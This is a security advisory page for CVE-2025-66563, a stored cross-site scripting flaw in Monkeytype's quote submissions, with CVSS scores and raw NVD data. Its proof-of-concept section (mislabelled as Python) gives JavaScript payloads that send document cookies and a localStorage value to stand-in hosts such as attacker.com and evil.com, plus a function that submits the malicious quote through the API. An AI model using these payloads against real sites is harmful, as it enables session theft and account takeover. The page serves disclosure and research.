Security Vulnerability Report
中文
CVE-2025-66563 CVSS 6.1 MEDIUM

CVE-2025-66563

Published: 2025-12-04 23:15:47
Last Modified: 2025-12-17 16:12:09
Source: [email protected]

Description

Monkeytype is a minimalistic and customizable typing test. In 25.49.0 and earlier, there is improper handling of user input which allows an attacker to execute malicious javascript on anyone viewing a malicious quote submission. quote.text and quote.source are user input, and they're inserted straight into the DOM. If they contain HTML tags, they will be rendered (after some escaping using quotes and textarea tags).

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:monkeytype:monkeytype:*:*:*:*:*:*:*:* - VULNERABLE
Monkeytype <= 25.49.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Monkeytype CVE-2025-66563 Stored XSS PoC // Submit this payload as a quote text or source // Payload 1: Using img tag with onerror event const payload1 = '<img src=x onerror="alert(document.cookie)">'; // Payload 2: Using SVG element const payload2 = '<svg onload="fetch(`https://attacker.com/steal?c="+document.cookie)">'; // Payload 3: Using JavaScript protocol in anchor const payload3 = '<a href="javascript:fetch(`https://attacker.com/log?data="+localStorage.getItem('key'))">Click me</a>'; // Payload 4: Using body onload event const payload4 = '<body onload="fetch('https://evil.com?cookie='+document.cookie)">'; // Submit malicious quote via API async function submitMaliciousQuote(quoteText, source) { const response = await fetch('/api/quote', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ text: quoteText, source: source }) }); return response.json(); } // Example exploitation submitMaliciousQuote( '<img src=x onerror="fetch(`https://attacker.com/cookie?c=${document.cookie}`)">', 'Malicious Source' );

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66563", "sourceIdentifier": "[email protected]", "published": "2025-12-04T23:15:47.270", "lastModified": "2025-12-17T16:12:09.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Monkeytype is a minimalistic and customizable typing test. In 25.49.0 and earlier, there is improper handling of user input which allows an attacker to execute malicious javascript on anyone viewing a malicious quote submission. quote.text and quote.source are user input, and they're inserted straight into the DOM. If they contain HTML tags, they will be rendered (after some escaping using quotes and textarea tags)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monkeytype:monkeytype:*:*:*:*:*:*:*:*", "versionEndIncluding": "25.49.0", "matchCriteriaId": "A6ECFF90-451A-4F70-9378-C399D1B4512C"}]}]}], "references": [{"url": "https://github.com/monkeytypegame/monkeytype/commit/d6d062a77132ba7d6ba3b482d46ae329d3b8d695", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/monkeytypegame/monkeytype/security/advisories/GHSA-mfjh-9552-8g27", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/monkeytypegame/monkeytype/security/advisories/GHSA-mfjh-9552-8g27", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.